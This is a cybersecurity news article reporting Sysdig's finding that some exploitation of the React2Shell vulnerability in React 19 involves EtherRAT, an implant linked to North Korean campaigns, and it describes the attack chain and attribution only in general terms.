Some of the attacks exploiting the recently emerged React vulnerability dubbed React2Shell appear to have been conducted by North Korean threat actors, according to cybersecurity firm Sysdig.
The React2Shell vulnerability, officially tracked as CVE-2025-55182, can be exploited for unauthenticated remote code execution. The flaw impacts version 19 of the React open source library for creating application user interfaces.
In addition to React, CVE-2025-55182 impacts other related frameworks, including Next.js, Waku, React Router, and RedwoodSDK.
While React powers millions of applications, the actual number of vulnerable instances appears to be relatively small, with the Shadowserver Foundation seeing roughly 70,000 affected systems.
The existence of React2Shell came to light on December 3 and in-the-wild exploitation commenced shortly after.
[ Read: Cloudflare Outage Caused by React2Shell Mitigations ]
Based on the currently available information, China-linked threat groups were the first to exploit the vulnerability. Exploitation soon surged, with the cybersecurity community seeing attacks involving AWS credential theft, malware deployment (botnets), and cryptocurrency miners.
Sysdig has observed sophisticated attacks involving the deployment of EtherRAT, which the company described as a persistent access implant “that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.”
“EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” the security firm explained. “This combination of capabilities has not been previously observed in React2Shell exploitation.”
Sysdig’s analysis unearthed overlaps with the North Korea-linked campaign dubbed Contagious Interview, in which threat actors deliver malware to people associated with cryptocurrency and blockchain technologies through fake job interviews. The ultimate goal of the campaign is the theft of cryptocurrency from victims.
In the EtherRAT attack, React2Shell is exploited to execute a shell command for downloading and executing a shell script designed to deploy a JavaScript implant. This implant is a dropper that decrypts the main payload, EtherRAT.
“The encrypted loader pattern used in EtherRAT closely matches the DPRK-affiliated BeaverTail malware used in the Contagious Interview campaigns,” Sysdig said.
It added, “Notably, while Lazarus Group and other DPRK-affiliated threat actors historically bundle Node.js with their payloads, the sample we identified downloads Node.js from the official nodejs.org distribution. This represents a significant evolution in tradecraft: trading a smaller payload size for reduced detection risk.”
While the uncovered evidence seems to point to Lazarus or a different North Korean threat actor exploiting React2Shell as the initial delivery vector (as a replacement for fake job interviews), the security firm admits it’s also possible that “another sophisticated actor may be combining techniques from multiple documented campaigns to complicate attribution”.
Related: 5 Plead Guilty in US to Helping North Korean IT Workers
Related: North Korean Hackers Aim at European Drone Companies
